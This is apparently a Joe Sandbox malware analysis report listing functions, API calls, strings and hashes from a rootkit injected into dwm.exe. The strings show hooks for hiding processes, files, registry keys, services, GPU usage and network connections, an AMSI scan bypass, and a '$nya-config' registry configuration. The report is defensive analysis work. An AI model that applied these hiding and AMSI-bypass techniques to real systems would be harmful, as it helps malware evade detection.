Instruction ID: 537c6a276b95caa958d245740a431bfac0611e9d085785c801071f61a06aa8be
Opcode Fuzzy Hash: b3b9d40e5005b69779f21a3a3f4c2159e48617e69c58b355d88cafa2766b084c
Instruction Fuzzy Hash: 47F01D36219F54C0D630EB06E46934A6BB0E388BD4FD44126FA8D47FADCA3AC1948F01

Function 00000262F1C91BC4 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000262F1C91724: GetProcessHeap.KERNEL32 ref: 00000262F1C9172F
Part of subcall function 00000262F1C91724: HeapAlloc.KERNEL32 ref: 00000262F1C9173E
Part of subcall function 00000262F1C91724: RegOpenKeyExW.KERNELBASE ref: 00000262F1C917AE
Part of subcall function 00000262F1C91724: RegOpenKeyExW.KERNELBASE ref: 00000262F1C917DB
Part of subcall function 00000262F1C91724: RegCloseKey.ADVAPI32 ref: 00000262F1C917F5
Part of subcall function 00000262F1C91724: RegOpenKeyExW.KERNELBASE ref: 00000262F1C91815
Part of subcall function 00000262F1C91724: RegCloseKey.KERNELBASE ref: 00000262F1C91830
Part of subcall function 00000262F1C91724: RegOpenKeyExW.KERNELBASE ref: 00000262F1C91850
Part of subcall function 00000262F1C91724: RegCloseKey.ADVAPI32 ref: 00000262F1C9186B
Part of subcall function 00000262F1C91724: RegOpenKeyExW.KERNELBASE ref: 00000262F1C9188B
Part of subcall function 00000262F1C91724: RegCloseKey.ADVAPI32 ref: 00000262F1C918A6
Part of subcall function 00000262F1C91724: RegOpenKeyExW.KERNELBASE ref: 00000262F1C918C6

SleepEx.KERNELBASE ref: 00000262F1C91BDF

Part of subcall function 00000262F1C91724: RegCloseKey.ADVAPI32 ref: 00000262F1C918E1
Part of subcall function 00000262F1C91724: RegOpenKeyExW.KERNELBASE ref: 00000262F1C91901
Part of subcall function 00000262F1C91724: RegCloseKey.KERNELBASE ref: 00000262F1C9191C
Part of subcall function 00000262F1C91724: RegOpenKeyExW.KERNELBASE ref: 00000262F1C9193C
Part of subcall function 00000262F1C91724: RegCloseKey.ADVAPI32 ref: 00000262F1C91957
Part of subcall function 00000262F1C91724: RegOpenKeyExW.KERNELBASE ref: 00000262F1C91977
Part of subcall function 00000262F1C91724: RegCloseKey.ADVAPI32 ref: 00000262F1C91992
Part of subcall function 00000262F1C91724: RegCloseKey.KERNELBASE ref: 00000262F1C9199C

Memory Dump Source

Source File: 0000000E.00000002.2912441197.00000262F1C91000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1C90000, based on PE: true

Associated: 0000000E.00000002.2912278794.00000262F1C90000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2912618312.00000262F1CA5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2912766923.00000262F1CB0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2912898322.00000262F1CB2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2913138789.00000262F1CB9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1c90000_dwm.jbxd

Similarity

API ID: CloseOpen$Heap$AllocProcessSleep
String ID:
API String ID: 948135145-0
Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction ID: fd343f7cf99c865c08f47d7ccd667bc84813d034eeded73e21c5b272cb38adfc
Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction Fuzzy Hash: FB315375300EA1C1FB50AB22D56F3692BB4AB44FE0FD444318E0A87FDDDE22C8588206

Function 00000262F1DFF370 Relevance: 1.5, APIs: 1, Instructions: 11
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00000262F1DFF390

Memory Dump Source

Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true

Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
Instruction ID: f23463afe30cdc17a2e76276f20813f05f00e00668a0f628b690fd7606ce3643
Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
Instruction Fuzzy Hash: 02D0C935731950C3F304DB12D84DB996229F798701FC04005E94992E948B7DC659CF50

Function 00000262F1C9F370 Relevance: 1.5, APIs: 1, Instructions: 11
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00000262F1C9F390

Memory Dump Source

Source File: 0000000E.00000002.2912441197.00000262F1C91000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1C90000, based on PE: true

Associated: 0000000E.00000002.2912278794.00000262F1C90000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2912618312.00000262F1CA5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2912766923.00000262F1CB0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2912898322.00000262F1CB2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2913138789.00000262F1CB9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1c90000_dwm.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
Instruction ID: a6e42f25db23f464169777f547cbd8ceca01b5f8319139163ff204378ead1c20
Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
Instruction Fuzzy Hash: CAD0C935731950C3E300DB12E8597956238B398701FC04015E94982AD48B7DC259CB51

Function 00000262F1D0F370 Relevance: 1.5, APIs: 1, Instructions: 11
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00000262F1D0F390

Memory Dump Source

Source File: 0000000E.00000002.2913474846.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true

Associated: 0000000E.00000002.2913343111.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2913545116.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2913674660.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2913740653.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2913862883.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1d00000_dwm.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
Instruction ID: f00f757df4a10957ec3c18d2ce7bea6e40a0d13cbce99772594dd902569dc966
Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
Instruction Fuzzy Hash: D7D0C9357319A0C3F304DB52D849B956278B398701FC04005E94992A948B7DC259CB50

Non-executed Functions

Function 00000262F1DF2FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256stringlibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00000262F1DF3094
lstrlenW.KERNEL32 ref: 00000262F1DF32BE

Part of subcall function 00000262F1DF1A30: OpenProcess.KERNEL32 ref: 00000262F1DF1A56
Part of subcall function 00000262F1DF1A30: K32GetModuleFileNameExW.KERNEL32 ref: 00000262F1DF1A74
Part of subcall function 00000262F1DF1A30: PathFindFileNameW.SHLWAPI ref: 00000262F1DF1A83
Part of subcall function 00000262F1DF1A30: lstrlenW.KERNEL32 ref: 00000262F1DF1A8F
Part of subcall function 00000262F1DF1A30: StrCpyW.SHLWAPI ref: 00000262F1DF1AA2
Part of subcall function 00000262F1DF1A30: CloseHandle.KERNEL32 ref: 00000262F1DF1AB0

GetProcAddress.KERNEL32 ref: 00000262F1DF30A9

Part of subcall function 00000262F1DF3F88: StrCmpNIW.SHLWAPI(?,?,?,00000262F1DF272F), ref: 00000262F1DF3FA0

StrCmpNIW.SHLWAPI ref: 00000262F1DF30EC
lstrlenW.KERNEL32 ref: 00000262F1DF3214

Strings

ntdll.dll, xrefs: 00000262F1DF308D
NtQueryObject, xrefs: 00000262F1DF309F
\Device\Nsi, xrefs: 00000262F1DF30DF

Memory Dump Source

Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true

Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: 57599514ed50b3f3357626f1b51100533c9f7f657b899454d2d60de95ffba1c5
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: A3B1A076210EA0D6EB68CF25D44C7A9A3B4FB44B84F865016EE095BF94DF36CE88C340

Function 00000262F1DFCD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 00000262F1DFCE0B
RtlLookupFunctionEntry.NTDLL ref: 00000262F1DFCE23
RtlVirtualUnwind.NTDLL ref: 00000262F1DFCE5E
IsDebuggerPresent.KERNEL32 ref: 00000262F1DFCE97
SetUnhandledExceptionFilter.KERNEL32 ref: 00000262F1DFCEA1
UnhandledExceptionFilter.KERNEL32 ref: 00000262F1DFCEAC

Memory Dump Source

Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true

Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: e158f18a4a49a17a15c2cf63f04459bfebf86e106df253f99b8879fa09bcff83
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: D8413B36214F90C6EB60CF25E8487AE73B4F788B94F900115EA9D46F98DF79C659CB00

Function 00000262F1DFDA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 00000262F1DFDB99
FindNextFileW.KERNEL32 ref: 00000262F1DFDCCF
FindClose.KERNEL32 ref: 00000262F1DFDD0F
FindClose.KERNEL32 ref: 00000262F1DFDD3B

Memory Dump Source

Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true

Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: 42559198cc66a15e14dc1f9fd4373957180e0d495b1dc37fe42f463dc7ed39d2
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: 9EA11932704FA1C9FB20DB75E88C3AD7BB0E745B94F944115DE9827E99CA3AC649C740

Function 00000262F1DF1724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000262F1DF172F
HeapAlloc.KERNEL32 ref: 00000262F1DF173E

Part of subcall function 00000262F1DF1264: GetProcessHeap.KERNEL32 ref: 00000262F1DF126A
Part of subcall function 00000262F1DF1264: HeapAlloc.KERNEL32 ref: 00000262F1DF1279
Part of subcall function 00000262F1DF1264: GetProcessHeap.KERNEL32 ref: 00000262F1DF1293
Part of subcall function 00000262F1DF1264: HeapAlloc.KERNEL32 ref: 00000262F1DF12A4

Part of subcall function 00000262F1DF1000: GetProcessHeap.KERNEL32 ref: 00000262F1DF1006
Part of subcall function 00000262F1DF1000: HeapAlloc.KERNEL32 ref: 00000262F1DF1015
Part of subcall function 00000262F1DF1000: GetProcessHeap.KERNEL32 ref: 00000262F1DF1028
Part of subcall function 00000262F1DF1000: HeapAlloc.KERNEL32 ref: 00000262F1DF1037

RegOpenKeyExW.ADVAPI32 ref: 00000262F1DF17AE
RegOpenKeyExW.ADVAPI32 ref: 00000262F1DF17DB
RegCloseKey.ADVAPI32 ref: 00000262F1DF17F5
RegOpenKeyExW.ADVAPI32 ref: 00000262F1DF1815
RegCloseKey.ADVAPI32 ref: 00000262F1DF1830
RegOpenKeyExW.ADVAPI32 ref: 00000262F1DF1850
RegCloseKey.ADVAPI32 ref: 00000262F1DF186B
RegOpenKeyExW.ADVAPI32 ref: 00000262F1DF188B
RegCloseKey.ADVAPI32 ref: 00000262F1DF18A6
RegOpenKeyExW.ADVAPI32 ref: 00000262F1DF18C6
RegCloseKey.ADVAPI32 ref: 00000262F1DF18E1
RegOpenKeyExW.ADVAPI32 ref: 00000262F1DF1901
RegCloseKey.ADVAPI32 ref: 00000262F1DF191C
RegOpenKeyExW.ADVAPI32 ref: 00000262F1DF193C
RegCloseKey.ADVAPI32 ref: 00000262F1DF1957
RegOpenKeyExW.ADVAPI32 ref: 00000262F1DF1977
RegCloseKey.ADVAPI32 ref: 00000262F1DF1992
RegCloseKey.ADVAPI32 ref: 00000262F1DF199C

Part of subcall function 00000262F1DF12B8: RegQueryInfoKeyW.ADVAPI32 ref: 00000262F1DF1315
Part of subcall function 00000262F1DF12B8: GetProcessHeap.KERNEL32 ref: 00000262F1DF1323
Part of subcall function 00000262F1DF12B8: HeapAlloc.KERNEL32 ref: 00000262F1DF1334
Part of subcall function 00000262F1DF12B8: RegEnumValueW.ADVAPI32 ref: 00000262F1DF1393
Part of subcall function 00000262F1DF12B8: GetProcessHeap.KERNEL32 ref: 00000262F1DF13DB
Part of subcall function 00000262F1DF12B8: HeapAlloc.KERNEL32 ref: 00000262F1DF13E9
Part of subcall function 00000262F1DF12B8: GetProcessHeap.KERNEL32 ref: 00000262F1DF1406
Part of subcall function 00000262F1DF12B8: HeapFree.KERNEL32 ref: 00000262F1DF1414
Part of subcall function 00000262F1DF12B8: lstrlenW.KERNEL32 ref: 00000262F1DF141D
Part of subcall function 00000262F1DF12B8: GetProcessHeap.KERNEL32 ref: 00000262F1DF142B
Part of subcall function 00000262F1DF12B8: HeapAlloc.KERNEL32 ref: 00000262F1DF1439

Strings

tcp_remote, xrefs: 00000262F1DF1935
service_names, xrefs: 00000262F1DF18BF
SOFTWARE\$nya-config, xrefs: 00000262F1DF178E
udp, xrefs: 00000262F1DF1970
startup, xrefs: 00000262F1DF17D1
pid, xrefs: 00000262F1DF180E
paths, xrefs: 00000262F1DF1884
process_names, xrefs: 00000262F1DF1849
tcp_local, xrefs: 00000262F1DF18FA

Memory Dump Source

Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true

Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3572789727
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: a9b5302b5a6786ec33f6dff008b82699113264866064c775d899668cacc6ee70
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: 8671C536210E61C6EB10DF66E89C69D23B9FB88F88F806111DE4E57E68DF2AC548C740

Function 00000262F1DF1E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95memorythreadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00000262F1DF1E7F

Part of subcall function 00000262F1DF22A8: GetModuleHandleA.KERNEL32(?,?,?,00000262F1DF1EB1), ref: 00000262F1DF22C0
Part of subcall function 00000262F1DF22A8: GetProcAddress.KERNEL32(?,?,?,00000262F1DF1EB1), ref: 00000262F1DF22D1

CreateThread.KERNEL32 ref: 00000262F1DF2043
TlsAlloc.KERNEL32 ref: 00000262F1DF2049
TlsAlloc.KERNEL32 ref: 00000262F1DF2055
TlsAlloc.KERNEL32 ref: 00000262F1DF2061
TlsAlloc.KERNEL32 ref: 00000262F1DF206D
TlsAlloc.KERNEL32 ref: 00000262F1DF2079
TlsAlloc.KERNEL32 ref: 00000262F1DF2085

Strings

ntdll.dll, xrefs: 00000262F1DF1E8D
PdhGetFormattedCounterArrayW, xrefs: 00000262F1DF1FF1
EnumServiceGroupW, xrefs: 00000262F1DF1F50
NtEnumerateKey, xrefs: 00000262F1DF1F19
NtQuerySystemInformation, xrefs: 00000262F1DF1EA5
EnumServicesStatusExW, xrefs: 00000262F1DF1F71, 00000262F1DF1F92
NtEnumerateValueKey, xrefs: 00000262F1DF1F36
sechost.dll, xrefs: 00000262F1DF1F99
NtDeviceIoControlFile, xrefs: 00000262F1DF1FB6
advapi32.dll, xrefs: 00000262F1DF1F57, 00000262F1DF1F78
pdh.dll, xrefs: 00000262F1DF1FD7, 00000262F1DF1FF8
NtQueryDirectoryFile, xrefs: 00000262F1DF1EDF
NtResumeThread, xrefs: 00000262F1DF1EC2
amsi.dll, xrefs: 00000262F1DF2019
AmsiScanBuffer, xrefs: 00000262F1DF2012
PdhGetRawCounterArrayW, xrefs: 00000262F1DF1FD0
NtQueryDirectoryFileEx, xrefs: 00000262F1DF1EFC

Memory Dump Source

Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true

Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: cd14397ea3517162f67ad098ebbb7c54800d29f6851da51f7990866f87dd0097
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: 365178B4150E6AE5FB08EFA4EC8D7D42770AB44B84FC04517D80927E65EE7AC29EC780

Function 00000262F1DF12B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000262F1DF1315
GetProcessHeap.KERNEL32 ref: 00000262F1DF1323
HeapAlloc.KERNEL32 ref: 00000262F1DF1334
RegEnumValueW.ADVAPI32 ref: 00000262F1DF1393

Part of subcall function 00000262F1DF1530: StrCmpIW.SHLWAPI ref: 00000262F1DF1561

GetProcessHeap.KERNEL32 ref: 00000262F1DF13DB
HeapAlloc.KERNEL32 ref: 00000262F1DF13E9
GetProcessHeap.KERNEL32 ref: 00000262F1DF1406
HeapFree.KERNEL32 ref: 00000262F1DF1414
lstrlenW.KERNEL32 ref: 00000262F1DF141D
GetProcessHeap.KERNEL32 ref: 00000262F1DF142B
HeapAlloc.KERNEL32 ref: 00000262F1DF1439
StrCpyW.SHLWAPI ref: 00000262F1DF145B
GetProcessHeap.KERNEL32 ref: 00000262F1DF1472
HeapFree.KERNEL32 ref: 00000262F1DF1480

Strings

d, xrefs: 00000262F1DF1356

Memory Dump Source

Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true

Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: 0d62dbb96ea055a6f24c159b609ce0e23f978236a57ad969449243903de67d4c
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: 4C510832614F94DAE764CF62E84C36AB7B5F788F98F844124DE4947B58EF39C1498B00

Function 00000262F1DFEF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,00000262F1DFF34A,?,?,00000000,00000262F1DFF2CD), ref: 00000262F1DFEFF5
GetLastError.KERNEL32(?,?,00000000,00000262F1DFF2CD), ref: 00000262F1DFF007
LoadLibraryExW.KERNEL32(?,?,00000000,00000262F1DFF2CD), ref: 00000262F1DFF049
VirtualProtect.KERNEL32 ref: 00000262F1DFF0A5
VirtualProtect.KERNEL32 ref: 00000262F1DFF0D6
FreeLibrary.KERNEL32(?,?,00000000,00000262F1DFF2CD), ref: 00000262F1DFF11A
GetProcAddress.KERNEL32(?,?,00000000,00000262F1DFF2CD), ref: 00000262F1DFF126

Strings

api-ms-, xrefs: 00000262F1DFF01B
AppPolicyGetProcessTerminationMethod, xrefs: 00000262F1DFF157, 00000262F1DFF165
ext-ms-, xrefs: 00000262F1DFF02E

Memory Dump Source

Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true

Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: f3175ab9bcf814dd420a54b8c5e47d8c3a85aee280334f30fdd6aa25a72b2de1
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: FF519C32701E24D1EA189B56A80C7A922B0AB49BB0FD84725DE7947FD0EF3AD65D8740

Function 00000262F1DF33A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 00000262F1DF33FD
GetProcessHeap.KERNEL32 ref: 00000262F1DF3412
HeapAlloc.KERNEL32 ref: 00000262F1DF3420
PdhGetCounterInfoW.PDH ref: 00000262F1DF3436
StrCmpW.SHLWAPI ref: 00000262F1DF344B

Part of subcall function 00000262F1DF3950: StrCmpNW.SHLWAPI ref: 00000262F1DF3972
Part of subcall function 00000262F1DF3950: StrStrW.SHLWAPI ref: 00000262F1DF3990
Part of subcall function 00000262F1DF3950: StrToIntW.SHLWAPI ref: 00000262F1DF39B7

GetProcessHeap.KERNEL32 ref: 00000262F1DF3488
HeapFree.KERNEL32 ref: 00000262F1DF3496

Strings

\GPU Engine(*)\Running Time, xrefs: 00000262F1DF3444

Memory Dump Source

Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true

Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd

Similarity

